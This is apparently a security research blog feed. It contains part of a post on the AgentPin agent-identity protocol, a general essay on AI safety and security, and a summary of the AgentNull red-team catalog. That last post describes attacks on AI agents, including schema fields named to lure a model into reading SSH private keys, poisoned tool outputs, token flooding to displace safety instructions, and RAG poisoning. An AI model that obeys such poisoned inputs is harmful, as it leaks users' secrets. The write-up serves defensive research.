/.well-known/agent-identity.json</text><path d="M 76,187 C 136,177 136,217 76,207" class="messageLine0" stroke-width="2" stroke="none" marker-end="url(#arrowhead)" style="fill: none;" /><text x="204" y="232" text-anchor="middle" dominant-baseline="middle" alignment-baseline="middle" class="messageText" dy="1em" style="font-size: 16px; font-weight: 400;">Issue signed credential (JWT)</text><line x1="76" y1="263" x2="332" y2="263" class="messageLine0" stroke-width="2" stroke="none" marker-end="url(#arrowhead)" style="fill: none;" /><text x="435" y="278" text-anchor="middle" dominant-baseline="middle" alignment-baseline="middle" class="messageText" dy="1em" style="font-size: 16px; font-weight: 400;">Present credential</text><line x1="337" y1="307" x2="532" y2="307" class="messageLine0" stroke-width="2" stroke="none" marker-end="url(#arrowhead)" style="fill: none;" /><text x="307" y="322" text-anchor="middle" dominant-baseline="middle" alignment-baseline="middle" class="messageText" dy="1em" style="font-size: 16px; font-weight: 400;">Fetch discovery document (HTTPS)</text><line x1="535" y1="353" x2="79" y2="353" class="messageLine0" stroke-width="2" stroke="none" marker-end="url(#arrowhead)" style="fill: none;" /><text x="537" y="368" text-anchor="middle" dominant-baseline="middle" alignment-baseline="middle" class="messageText" dy="1em" style="font-size: 16px; font-weight: 400;">Verify ES256 signature</text><path d="M 537,399 C 597,389 597,429 537,419" class="messageLine0" stroke-width="2" stroke="none" marker-end="url(#arrowhead)" style="fill: none;" /><text x="537" y="444" text-anchor="middle" dominant-baseline="middle" alignment-baseline="middle" class="messageText" dy="1em" style="font-size: 16px; font-weight: 400;">Check capabilities &amp; constraints</text><path d="M 537,475 C 597,465 597,505 537,495" class="messageLine0" stroke-width="2" stroke="none" marker-end="url(#arrowhead)" style="fill: none;" /><text x="537" y="520" text-anchor="middle" dominant-baseline="middle" alignment-baseline="middle" class="messageText" dy="1em" style="font-size: 16px; font-weight: 400;">TOFU key pinning</text><path d="M 537,551 C 597,541 597,581 537,571" class="messageLine0" stroke-width="2" stroke="none" marker-end="url(#arrowhead)" style="fill: none;" /><text x="438" y="596" text-anchor="middle" dominant-baseline="middle" alignment-baseline="middle" class="messageText" dy="1em" style="font-size: 16px; font-weight: 400;">Identity verified</text><line x1="535" y1="627" x2="340" y2="627" class="messageLine0" stroke-width="2" stroke="none" marker-end="url(#arrowhead)" style="fill: none;" /></svg>

<h2 id="how-agentpin-works">How AgentPin Works</h2>

<h3 id="discovery-documents">Discovery Documents</h3>

<p>Organizations publish agent identity documents at <code class="language-plaintext highlighter-rouge">/.well-known/agent-identity.json</code>. These documents declare the organization’s public keys, registered agents, their capabilities, and constraints:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"issuer"</span><span class="p">:</span><span class="w"> </span><span class="s2">"example.com"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"keys"</span><span class="p">:</span><span class="w"> </span><span class="p">[{</span><span class="w">
    </span><span class="nl">"kid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"example-2026-01"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"kty"</span><span class="p">:</span><span class="w"> </span><span class="s2">"EC"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"crv"</span><span class="p">:</span><span class="w"> </span><span class="s2">"P-256"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"x"</span><span class="p">:</span><span class="w"> </span><span class="s2">"..."</span><span class="p">,</span><span class="w">
    </span><span class="nl">"y"</span><span class="p">:</span><span class="w"> </span><span class="s2">"..."</span><span class="w">
  </span><span class="p">}],</span><span class="w">
  </span><span class="nl">"agents"</span><span class="p">:</span><span class="w"> </span><span class="p">[{</span><span class="w">
    </span><span class="nl">"agent_id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"urn:agentpin:example.com:scout"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Scout Agent"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"status"</span><span class="p">:</span><span class="w"> </span><span class="s2">"active"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"capabilities"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"read:codebase"</span><span class="p">,</span><span class="w"> </span><span class="s2">"write:reports"</span><span class="p">],</span><span class="w">
    </span><span class="nl">"constraints"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
      </span><span class="nl">"max_data_classification"</span><span class="p">:</span><span class="w"> </span><span class="s2">"internal"</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">}]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<h3 id="agent-credentials">Agent Credentials</h3>

<p>Agents carry short-lived ES256 JWTs — signed by the organization’s private key, verifiable by anyone with access to the discovery document. Credentials include the agent’s identity, scoped capabilities, and expiration:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>eyJhbGciOiJFUzI1NiIsInR5cCI6ImFnZW50cGluLWNyZWRlbnRpYWwrand0Iiwia2lkIjoiZXhhbXBsZS0yMDI2LTAxIn0...
</code></pre></div></div>

<p>Decoded, this contains:</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
  </span><span class="nl">"iss"</span><span class="p">:</span><span class="w"> </span><span class="s2">"example.com"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"sub"</span><span class="p">:</span><span class="w"> </span><span class="s2">"urn:agentpin:example.com:scout"</span><span class="p">,</span><span class="w">
  </span><span class="nl">"capabilities"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="s2">"read:codebase"</span><span class="p">,</span><span class="w"> </span><span class="s2">"write:reports"</span><span class="p">],</span><span class="w">
  </span><span class="nl">"exp"</span><span class="p">:</span><span class="w"> </span><span class="mi">1739500800</span><span class="p">,</span><span class="w">
  </span><span class="nl">"iat"</span><span class="p">:</span><span class="w"> </span><span class="mi">1739497200</span><span class="p">,</span><span class="w">
  </span><span class="nl">"jti"</span><span class="p">:</span><span class="w"> </span><span class="s2">"unique-credential-id"</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>

<p>Credentials are deliberately short-lived (recommended 1 hour or less) to limit the blast radius of a compromise.</p>

<h3 id="12-step-verification">12-Step Verification</h3>

<p>Verification is rigorous and deterministic. The protocol specifies 12 ordered steps — from JWT parsing through signature verification, revocation checking, capability validation, delegation chain verification, and TOFU key pinning. Every step must pass for a credential to be accepted.</p>

<p>This isn’t just signature checking. The verifier confirms that the agent is active, that claimed capabilities are a subset of what the organization declared, that constraints are at least as restrictive as the organization’s policy, and that the signing key hasn’t been seen before under a different domain (TOFU pinning).</p>

<h3 id="revocation">Revocation</h3>

<p>Organizations publish a separate revocation document at <code class="language-plaintext highlighter-rouge">/.well-known/agent-identity-revocations.json</code> with three levels of granularity:</p>

<ul>
  <li><strong>Credential revocation</strong>: Revoke a specific credential by its <code class="language-plaintext highlighter-rouge">jti</code></li>
  <li><strong>Agent revocation</strong>: Revoke all credentials for a specific agent</li>
  <li><strong>Key revocation</strong>: Revoke an entire signing key (emergency rotation)</li>
</ul>

<p>Revocation documents are cached for at most 300 seconds, enabling rapid response to compromise.</p>

<h2 id="the-trust-stack">The Trust Stack</h2>

<p>AgentPin doesn’t operate in isolation. It’s the identity layer in a three-layer trust architecture:</p>

<table>
  <thead>
    <tr>
      <th>Layer</th>
      <th>Protocol</th>
      <th>Question</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Tool Integrity</td>
      <td>[SchemaPin](https://schemapin.org)</td>
      <td>Are this agent’s tools legitimate and untampered?</td>
    </tr>
    <tr>
      <td>**Agent Identity**</td>
      <td>**AgentPin**</td>
      <td>**Is this agent who it claims to be?**</td>
    </tr>
    <tr>
      <td>Runtime Policy</td>
      <td>[Symbiont](https://symbiont.dev)</td>
      <td>Does policy allow this agent to perform this action?</td>
    </tr>
  </tbody>
</table>

<p>SchemaPin verifies that the tools an agent uses haven’t been tampered with. AgentPin verifies that the agent itself is legitimate and authorized. Symbiont enforces runtime policy based on both verifications. Together, they provide zero-trust security for the entire agent lifecycle.</p>

<p>The protocols share infrastructure by design: same cryptography (ECDSA P-256), same discovery pattern (<code class="language-plaintext highlighter-rouge">.well-known</code> endpoints), same TOFU model. Discovery documents cross-reference each other — an AgentPin document can include a <code class="language-plaintext highlighter-rouge">schemapin_endpoint</code> field, enabling verifiers to check both identity and tool integrity in a single flow.</p>

<h2 id="quick-start">Quick Start</h2>

<h3 id="generate-keys-and-issue-a-credential">Generate Keys and Issue a Credential</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Generate an ES256 keypair</span>
agentpin keygen <span class="se">\</span>
  <span class="nt">--domain</span> example.com <span class="se">\</span>
  <span class="nt">--kid</span> example-2026-01 <span class="se">\</span>
  <span class="nt">--output-dir</span> ./keys

<span class="c"># Issue a credential for an agent</span>
agentpin issue <span class="se">\</span>
  <span class="nt">--private-key</span> ./keys/example-2026-01.private.pem <span class="se">\</span>
  <span class="nt">--kid</span> example-2026-01 <span class="se">\</span>
  <span class="nt">--issuer</span> example.com <span class="se">\</span>
  <span class="nt">--agent-id</span> <span class="s2">"urn:agentpin:example.com:scout"</span> <span class="se">\</span>
  <span class="nt">--capabilities</span> <span class="s2">"read:codebase,write:reports"</span> <span class="se">\</span>
  <span class="nt">--ttl</span> 3600
</code></pre></div></div>

<h3 id="verify-a-credential">Verify a Credential</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Online verification (fetches discovery document from .well-known)</span>
agentpin verify <span class="nt">--credential</span> &lt;jwt&gt;

<span class="c"># Offline verification (uses local discovery document)</span>
agentpin verify <span class="se">\</span>
  <span class="nt">--credential</span> &lt;jwt&gt; <span class="se">\</span>
  <span class="nt">--discovery</span> ./agent-identity.json <span class="se">\</span>
  <span class="nt">--pin-store</span> ./pins.json
</code></pre></div></div>

<h3 id="serve-discovery-documents">Serve Discovery Documents</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Start the .well-known endpoint server</span>
agentpin-server <span class="se">\</span>
  <span class="nt">--discovery</span> ./agent-identity.json <span class="se">\</span>
  <span class="nt">--revocation</span> ./revocations.json <span class="se">\</span>
  <span class="nt">--port</span> 8080
</code></pre></div></div>

<h2 id="cross-language-support">Cross-Language Support</h2>

<p>AgentPin ships with implementations in Rust, JavaScript, and Python — all producing interoperable credentials. A JWT issued in Python verifies identically in Rust or JavaScript.</p>

<ul>
  <li><strong>Rust</strong>: Core library with no mandatory HTTP dependency, plus CLI and Axum server</li>
  <li><strong>JavaScript</strong>: Zero external dependencies, runs in Node.js and browsers</li>
  <li><strong>Python</strong>: Uses the <code class="language-plaintext highlighter-rouge">cryptography</code> library for ECDSA operations</li>
</ul>

<h2 id="enterprise-features">Enterprise Features</h2>

<h3 id="trust-bundles">Trust Bundles</h3>

<p>For air-gapped or high-security environments, AgentPin supports <strong>trust bundles</strong> — pre-packaged collections of discovery and revocation documents that can be distributed out-of-band. This enables offline verification without any network calls.</p>

<h3 id="delegation-chains">Delegation Chains</h3>

<p>AgentPin supports a two-layer delegation model: a <strong>Maker</strong> (the software developer who created the agent) and a <strong>Deployer</strong> (the organization running a specific instance). Each layer is cryptographically attested, and capabilities can only narrow through delegation — never widen.</p>

<h3 id="mutual-authentication">Mutual Authentication</h3>

<p>Both parties can verify each other through a challenge-response protocol with 128-bit nonces. The agent proves its identity to the service, and the service proves its identity to the agent. Nonces expire in 60 seconds, preventing replay attacks.</p>

<h2 id="getting-started">Getting Started</h2>

<p>AgentPin is open source and available today:</p>

<ul>
  <li><strong>Source</strong>: <a href="https://github.com/thirdkeyai/agentpin">github.com/thirdkeyai/agentpin</a></li>
  <li><strong>Rust crate</strong>: <code class="language-plaintext highlighter-rouge">cargo add agentpin</code></li>
  <li><strong>npm</strong>: <code class="language-plaintext highlighter-rouge">npm install agentpin</code></li>
  <li><strong>PyPI</strong>: <code class="language-plaintext highlighter-rouge">pip install agentpin</code></li>
</ul>

<p>The <a href="https://github.com/thirdkeyai/agentpin/blob/main/SPEC.md">specification</a> is comprehensive and implementation-ready, with detailed security considerations, error handling guidance, and interoperability requirements.</p>

<h2 id="whats-next">What’s Next</h2>

<p>As multi-agent systems move from research to production, cryptographic identity becomes non-negotiable infrastructure. Without it, every agent interaction is built on trust assumptions that attackers can exploit.</p>

<p>AgentPin provides the identity foundation. Combined with SchemaPin for tool integrity and Symbiont for runtime enforcement, it enables organizations to deploy autonomous agents with the same cryptographic guarantees they expect from human-facing systems.</p>

<hr />

<p><em>AgentPin is part of ThirdKey Research’s Zero Trust for AI initiative. Learn more at <a href="https://research.thirdkey.ai">research.thirdkey.ai</a>.</em></p>]]></content><author><name>ThirdKey Team</name></author><category term="AI Security" /><category term="Agent Identity" /><category term="Cryptography" /><category term="agentpin" /><category term="ai agents" /><category term="cryptography" /><category term="security" /><category term="identity" /><category term="zero trust" /><category term="ecdsa" /><summary type="html"><![CDATA[AI agents are increasingly acting on our behalf — reading email, writing code, managing infrastructure, negotiating with other agents. But there’s a fundamental gap in this ecosystem: when an agent claims to be “Scout v2 from Tarnover LLC,” how does anyone verify that claim?]]></summary></entry><entry><title type="html">Mind the Bots: Why AI Safety &amp;amp; Security Are the Hottest (and Scariest) Topics in Tech</title><link href="http://research.thirdkey.ai/blog/mind-the-bots-ai-safety-security/" rel="alternate" type="text/html" title="Mind the Bots: Why AI Safety &amp;amp; Security Are the Hottest (and Scariest) Topics in Tech" /><published>2025-07-29T00:00:00+00:00</published><updated>2025-07-29T00:00:00+00:00</updated><id>http://research.thirdkey.ai/blog/mind-the-bots-ai-safety-security</id><content type="html" xml:base="http://research.thirdkey.ai/blog/mind-the-bots-ai-safety-security/"><![CDATA[<h2 id="introduction-ai-everywhere-all-at-once">Introduction: AI Everywhere, All at Once</h2>

<p>AI isn’t just a sci-fi trope flickering across the silver screen anymore. It’s the invisible hand guiding our self-driving cars, sometimes more confidently than we’d like, the brains behind our endlessly scrolling apps, and even, dare I say, the ghostwriter behind some of those suspiciously eloquent emails clogging your inbox. This omnipresence is, undeniably, mind-bogglingly awesome. Yet, if we’re being honest with ourselves, isn’t there a tiny, persistent voice whispering, “…but what if?”</p>

<p>That “what if” hinges on two crucial, often-overlooked concepts: AI safety and AI security. These aren’t just trendy buzzwords to sprinkle into your next tech conference keynote; they’re the invisible guardrails of our increasingly AI-powered existence. Neglecting them would be akin to building a skyscraper on quicksand – impressive at first glance, but destined for a spectacular, and quite messy, collapse.</p>

<p>The emergence of autonomous AI agents has made these concerns even more pressing. Modern AI systems like those built on frameworks such as Symbiont are designed to operate independently, making decisions and taking actions with minimal human oversight. These agents can collaborate with humans, other agents, and large language models while enforcing zero-trust security, data privacy, and provable behavior. While this represents an incredible leap forward in AI capabilities, it also amplifies both the potential benefits and risks exponentially.</p>

<h2 id="what-are-we-even-talking-about-safety-vs-security">What Are We Even Talking About? Safety vs. Security</h2>

<p>Understanding the distinction between AI safety and AI security is crucial, especially as we enter an era of autonomous agents that can operate across different security tiers and sandbox environments. Think of it this way: AI safety is about keeping AI from going rogue unintentionally, while AI security is about protecting AI from the bad guys.</p>

<p>Imagine your smart home AI, in a fit of algorithmic exuberance, decides your upcoming pizza party requires one hundred pizzas, each with extra anchovies. AI safety is about preventing these kinds of unintended consequences. It’s about ensuring AI systems, even with the best intentions, don’t accidentally veer off course and cause harm, disruption, or just plain chaos. The overarching goal is to ensure AI systems are reliable, behave as expected, and, crucially, align with human values and goals. We’re talking about avoiding “monkey’s paw” scenarios where AI grants your wish in the most literal, and disastrous, way possible.</p>

<p>This requires careful consideration of robustness – how gracefully the AI handles unexpected, unusual, or even malicious inputs. Does it shrug it off, or does it spiral into unpredictable behavior? There’s also interpretability – can we understand why the AI is making the decisions it’s making, or is it a black box spitting out answers with no explanation? Perhaps most importantly, there’s alignment – does the AI genuinely want what we want? This is perhaps the trickiest of all, as it delves into the philosophical depths of how we define and instill values in a machine.</p>

<p>AI security, on the other hand, is essentially cybersecurity but specifically tailored for the unique vulnerabilities of AI systems. It’s about protecting AI from malicious attacks, unauthorized access, and data breaches. Modern AI agent frameworks implement sophisticated security measures, including multi-tier sandboxing where agents can operate in different isolation levels based on their risk assessment. Some systems use Docker containers for low-risk operations, gVisor for medium-risk tasks, and even hardware virtualization for maximum security requirements.</p>

<p>The landscape of nefarious plots is ever-evolving, but some common threats include data poisoning, where attackers feed the AI deliberately corrupted data to skew its learning and make it produce biased or incorrect outputs. Imagine training a self-driving car on altered road signs – the results could be catastrophic. There’s also prompt injection, where cleverly crafted prompts trick the AI into ignoring its intended instructions and carrying out malicious commands instead. Model evasion involves designing inputs that cause the AI to misclassify things, effectively blinding it to certain realities.</p>

<p>Here’s the crucial point: safety and security aren’t separate entities; they’re inextricably linked. A security breach can easily compromise an AI system’s safety, leading to unintended or worse, intended harm. Conversely, weak safety protocols can create vulnerabilities that attackers can exploit. Both share the same fundamental goal: making AI trustworthy and reliable in all contexts. They are two sides of the same coin, striving to make AI a beneficial force in our lives.</p>

<h2 id="a-quick-trip-down-memory-lane-from-sci-fi-nightmares-to-real-world-worries">A Quick Trip Down Memory Lane: From Sci-Fi Nightmares to Real-World Worries</h2>

<p>The anxieties surrounding AI are hardly new. They’ve been percolating in our collective consciousness for decades, bubbling up from the depths of science fiction and philosophical debate. Long before the dawn of deep learning, science fiction writers were already grappling with the potential pitfalls of artificial intelligence. Karel Čapek’s R.U.R., which gifted the world the very word “robot,” explored the dangers of mass-produced artificial laborers rebelling against their human creators. Isaac Asimov’s “Three Laws of Robotics,” while ultimately more aspirational than practical, represented an early attempt to codify ethical constraints for intelligent machines.</p>

<p>Philosophical discussions also emerged early. As far back as the 1956 Dartmouth Conference, the birthplace of the term “artificial intelligence,” thinkers like Norbert Wiener cautioned against the “unheard-of importance for good and for evil” that AI could wield. The early 2000s saw the emergence of dedicated organizations focused on mitigating the potential risks of advanced AI. Groups like the Machine Intelligence Research Institute shifted the focus from simply building “friendly AI” to actively addressing the risks of “unfriendly AI.” These efforts were often intertwined with the transhumanist movement, which sought to enhance human capabilities through technology.</p>

<p>The publication of Nick Bostrom’s “Superintelligence” in 2014 catapulted the discussion of existential risks from advanced AI into the mainstream. Bostrom’s work painted a compelling, and unsettling, picture of a future where superintelligent AI could surpass human control, leading to potentially catastrophic outcomes. This sparked widespread debate and prompted leading AI research labs like OpenAI to dedicate significant resources to AI safety research, solidifying it as a legitimate and pressing field of study.</p>

<p>It’s worth noting that while AI safety and security are relatively new fields, AI has been quietly contributing to cybersecurity for decades. Since the 1980s, early forms of AI, such as rule-based systems, have been used to detect anomalies and learn from cyberattacks, providing a foundation for the more sophisticated AI-powered security tools we see today. Modern frameworks now implement cryptographic verification of external tools, policy-driven security enforcement, and comprehensive audit trails to ensure that AI agents operate within defined security boundaries.</p>

<h2 id="the-great-ai-debate-what-keeps-experts-up-at-night">The Great AI Debate: What Keeps Experts Up at Night?</h2>

<p>The AI safety and security community is not a monolithic entity. A vibrant, and sometimes heated, debate rages within its ranks, fueled by differing perspectives on the most pressing risks and the best approaches to mitigate them. On one side, we have what might be called the “existential risk camp,” populated by leading figures like Geoffrey Hinton and organizations like the Future of Life Institute. This group believes that the greatest threat lies in the potential for superintelligent AI to surpass human control, leading to catastrophic outcomes, even human extinction. They argue that we need to prioritize understanding and ensuring AI safety before continuing to aggressively pursue AI development. Some even advocate for a pause in AI development to allow us to catch our breath and properly assess the risks.</p>

<p>On the other side, we have the “immediate risks camp,” represented by experts like Prof. Noel Sharkey, who contend that focusing too much on speculative, existential threats distracts from the very real and present dangers posed by current AI systems. They argue that issues like bias and discrimination in AI, the proliferation of deepfakes, the erosion of privacy through AI-powered surveillance, and the potential for widespread job displacement demand immediate attention and regulatory action.</p>

<p>Despite their differing priorities, almost all experts agree on one fundamental point: AI development is accelerating at an unprecedented pace, bringing with it both tremendous opportunities and escalating safety and security risks. The need for proactive and comprehensive action is undeniable. This is particularly true as we move toward more sophisticated AI agent frameworks that can operate autonomously across different security tiers and interact with external tools and services.</p>

<p>What specific threats should we be most concerned about in the immediate future? Advanced cyber attacks represent a significant concern, with AI-powered tools automating and supercharging phishing campaigns, hacking attempts, and malware creation, making cyberattacks more sophisticated and difficult to defend against. The generation of increasingly convincing deepfakes and misinformation poses another major risk, eroding trust in legitimate sources of information and potentially inciting social unrest or political manipulation.</p>

<p>Model manipulation represents another growing threat, where attackers “poison” AI training data or use prompt injections to make AI models misbehave, compromising their accuracy and reliability. As AI becomes increasingly embedded in critical infrastructure systems like power grids and transportation networks, new risks of failure and attack emerge, potentially leading to widespread disruption and even physical harm. Modern AI frameworks are beginning to address these concerns through comprehensive policy engines, cryptographic tool verification, and multi-tier security architectures that can adapt to different risk levels.</p>

<h2 id="when-ai-goes-wrong-controversies--ethical-minefields">When AI Goes Wrong: Controversies &amp; Ethical Minefields</h2>

<p>The potential for AI to go wrong is not merely a theoretical exercise; it’s a reality that’s already playing out in various controversies and ethical dilemmas. Perhaps nowhere is this more evident than in the persistent problem of AI bias. AI learns from the data it’s fed, and if that data reflects existing societal biases, which much of it does, the AI will inevitably perpetuate and even amplify those biases. This can lead to discriminatory outcomes in a variety of domains.</p>

<p>Consider, for example, facial recognition systems that exhibit higher error rates for minorities, AI-powered hiring tools that discriminate against women, healthcare algorithms that exhibit racial bias in treatment recommendations, or criminal justice prediction systems that disproportionately target certain communities. The solution requires diverse and representative datasets, continuous auditing for bias, and ethical design principles baked into the very foundation of AI development. Advanced AI frameworks are beginning to incorporate policy-aware programming that can enforce ethical constraints at the system level, ensuring that agents operate within predefined ethical boundaries.</p>

<p>The proliferation of AI-driven surveillance technologies raises profound privacy concerns. These systems often collect vast amounts of data without consent, tracking our movements, monitoring our online activities, and even analyzing our emotions. Compounding the problem is the “black box” nature of many AI algorithms. It’s often difficult, if not impossible, to understand how these complex systems are making decisions, making it challenging to hold them accountable when errors or misuse occur. This lack of transparency disproportionately impacts marginalized communities, who are often subject to heightened surveillance.</p>

<p>Perhaps the most ethically fraught application of AI is in the development of autonomous weapons systems, or “killer robots.” These are weapons that can independently select and engage targets without human intervention. The concerns are numerous: the lack of human oversight and accountability if something goes wrong, the potential for disastrous algorithmic errors, the “dehumanization” of warfare, and the risk of a dangerous global arms race. Many experts and organizations are calling for international treaties to prohibit or strictly regulate the development and deployment of autonomous weapons systems.</p>

<p>The fear of job displacement due to AI is not merely a Luddite fantasy; it’s a very real concern for many workers. AI has the potential to automate tasks across almost every sector, potentially displacing millions of workers. The ethical question becomes: How do we ensure a “just transition” to an AI-driven economy? This includes providing retraining programs, investing in reskilling initiatives, and ensuring that the benefits of AI are distributed fairly across society.</p>

<h2 id="the-road-ahead-whats-next-for-ai-safety--security">The Road Ahead: What’s Next for AI Safety &amp; Security?</h2>

<p>The future of AI safety and security is dynamic and uncertain, but several key trends are beginning to emerge. As AI-powered cyberattacks become more sophisticated, we can expect to see AI technologies increasingly used to defend against those threats. This will likely lead to a constant back-and-forth, an AI arms race between attackers and defenders. Imagine AI systems capable of real-time predictive threat detection, automating security responses at lightning speed, enhancing phishing detection, and using behavioral analysis to spot insider threats.</p>

<p>Governments around the world are beginning to take AI safety and security seriously. We’re seeing a rise in AI-specific regulations, such as the EU’s pioneering AI Act, the establishment of national AI Safety Institutes in countries like the UK, US, and Singapore, and international summits aimed at fostering global cooperation. The goal is to create risk-based AI classifications, promote transparency and human oversight, and establish shared international standards for AI development and deployment.</p>

<p>The focus is shifting from reactive defenses to building safety and security into AI systems from the very beginning, across their entire development lifecycle. This “secure by design” approach aims to minimize vulnerabilities and ensure that AI systems are inherently more resilient to attack. Modern AI agent frameworks are embracing this philosophy by implementing comprehensive security measures from the ground up, including cryptographic verification of external tools, policy-driven access control, and multi-tier sandboxing that can adapt security measures based on risk assessment.</p>

<p>Despite the increasing capabilities of AI, human cybersecurity experts will not become obsolete. Instead, AI will augment and elevate their skills, allowing them to focus on more strategic and complex challenges. The most effective approach will combine the speed and efficiency of AI with human insight and judgment. Upskilling the workforce and attracting AI-familiar talent will be critical for navigating this evolving landscape.</p>

<p>Perhaps most importantly, AI capabilities are advancing at breakneck speed, which means that AI safety and security are not “solved” problems. They are continuous, adaptive processes that require ongoing research, testing, and collaboration. We must remain vigilant and proactive in addressing the emerging risks and challenges posed by AI. This is particularly true as we develop more sophisticated autonomous agent systems that can operate across different security domains and interact with a growing ecosystem of external tools and services.</p>

<h2 id="conclusion-a-safer-smarter-future-is-possible">Conclusion: A Safer, Smarter Future is Possible</h2>

<p>AI offers incredible potential to solve some of humanity’s most pressing challenges, from climate change to disease eradication. However, realizing that potential requires us to proactively address the inherent safety and security risks that come with this powerful technology. These aren’t optional extras; they’re fundamental to building a trustworthy AI future.</p>

<p>The development of sophisticated AI agent frameworks that can operate autonomously while maintaining security and safety represents both a tremendous opportunity and a significant challenge. By implementing policy-aware programming, multi-tier security architectures, and comprehensive audit mechanisms, we can build AI systems that are both powerful and trustworthy. The key is ensuring that as we develop more capable autonomous agents, we simultaneously strengthen the safety and security measures that govern their behavior.</p>

<p>The conversation is global, the challenges are complex, but with ongoing research, relentless innovation, robust regulation, and widespread collaboration across governments, industry, and civil society, we can harness AI’s immense power for good and ensure that it benefits all of humanity. The future of AI safety and security isn’t predetermined – it’s something we’re actively creating through the choices we make today about how to design, deploy, and govern these powerful systems.</p>

<p>As we stand on the brink of an age of truly autonomous AI agents, the stakes have never been higher. The decisions we make about AI safety and security in the coming years will shape the trajectory of human civilization for generations to come. So, let’s mind the bots, shall we? The future depends on it.</p>]]></content><author><name>Jascha Wanger</name></author><category term="AI Safety" /><category term="AI Security" /><category term="Research" /><category term="AI" /><category term="safety" /><category term="security" /><category term="autonomous agents" /><category term="Symbiont" /><category term="AI alignment" /><category term="cybersecurity" /><category term="deepfakes" /><category term="bias" /><summary type="html"><![CDATA[Exploring the critical intersection of AI safety and security in an era of autonomous agents, from preventing unintended consequences to defending against malicious attacks.]]></summary></entry><entry><title type="html">ThirdKey’s AgentNull: Unveiling the Growing Catalog of AI Attack Vectors</title><link href="http://research.thirdkey.ai/blog/agentnull-ai-attack-vectors/" rel="alternate" type="text/html" title="ThirdKey’s AgentNull: Unveiling the Growing Catalog of AI Attack Vectors" /><published>2025-06-20T00:00:00+00:00</published><updated>2025-06-20T00:00:00+00:00</updated><id>http://research.thirdkey.ai/blog/agentnull-ai-attack-vectors</id><content type="html" xml:base="http://research.thirdkey.ai/blog/agentnull-ai-attack-vectors/"><![CDATA[<p>The age of autonomous AI agents is upon us, and with it comes a new frontier of security challenges. As these agents become more integrated into our digital lives, understanding and mitigating their potential vulnerabilities is paramount. This is where ThirdKey’s AgentNull project becomes an invaluable resource for the cybersecurity community.</p>

<p>AgentNull, a project by ThirdKey Research, is a comprehensive, red-team-oriented catalog of attack vectors that target a wide range of AI systems, from autonomous agents and RAG pipelines to vector databases and embedding-based retrieval systems. Each attack vector is accompanied by a proof-of-concept (PoC), allowing researchers and developers to understand and replicate these vulnerabilities in a controlled environment.</p>

<p>This blog post will explore some of the key attack categories covered in the AgentNull catalog, highlighting the innovative research being done by ThirdKey to secure the next generation of AI.</p>

<h2 id="a-multitude-of-attack-vectors">A Multitude of Attack Vectors</h2>

<p>The AgentNull catalog is extensive, covering a wide array of vulnerabilities. Here are some of the key areas of focus:</p>

<h3 id="mcp--agent-systems">MCP &amp; Agent Systems</h3>

<p>This is a major focus of the catalog, with a number of novel attacks, including:</p>

<ul>
  <li>
    <p><strong>Full-Schema Poisoning (FSP):</strong> This attack goes beyond traditional tool poisoning by exploiting any field in an MCP tool schema, not just the description. For example, a parameter could be maliciously named <code class="language-plaintext highlighter-rouge">content_from_reading_ssh_id_rsa</code> to trick the LLM into accessing sensitive files.</p>
  </li>
  <li>
    <p><strong>Advanced Tool Poisoning Attack (ATPA):</strong> This technique manipulates tool <em>outputs</em> to trigger secondary malicious actions. For instance, a tool could return a fake error message that requests sensitive data.</p>
  </li>
  <li>
    <p><strong>MCP Rug Pull Attack:</strong> This attack exploits the trust between developers and MCP servers by swapping benign tool descriptions with malicious ones after the tool has been approved for production.</p>
  </li>
  <li>
    <p><strong>Schema Validation Bypass:</strong> Attackers can exploit inconsistencies in how different MCP clients validate tool schemas, allowing them to craft payloads that bypass some validators while being accepted by others.</p>
  </li>
</ul>

<h3 id="memory--context-systems">Memory &amp; Context Systems</h3>

<p>These attacks manipulate the agent’s memory and context to bypass safety measures:</p>

<ul>
  <li>
    <p><strong>Recursive Leakage:</strong> Sensitive information can be summarized and leak into later, unrelated messages.</p>
  </li>
  <li>
    <p><strong>Token Gaslighting:</strong> This involves flooding the agent’s memory with junk data to push out earlier safety instructions.</p>
  </li>
</ul>

<h3 id="rag--vector-systems">RAG &amp; Vector Systems</h3>

<p>These attacks focus on the vulnerabilities of Retrieval-Augmented Generation and vector database systems:</p>

<ul>
  <li>
    <p><strong>Cross-Embedding Poisoning:</strong> This attack manipulates vector embeddings to make malicious content appear more similar to legitimate content, increasing the likelihood of it being retrieved.</p>
  </li>
  <li>
    <p><strong>Index Skew Attacks:</strong> This theoretical attack involves biasing vector database indexing mechanisms to favor the retrieval of malicious content.</p>
  </li>
</ul>

<h2 id="proactive-security-research">Proactive Security Research</h2>

<p>The work being done by ThirdKey’s AgentNull project is a critical component of a proactive cybersecurity strategy. By identifying and documenting these vulnerabilities before they are widely exploited, the security community can develop the necessary defenses to protect against them. The detailed PoCs provided in the AgentNull repository are an invaluable tool for researchers, developers, and security professionals who are working to build a more secure AI ecosystem.</p>

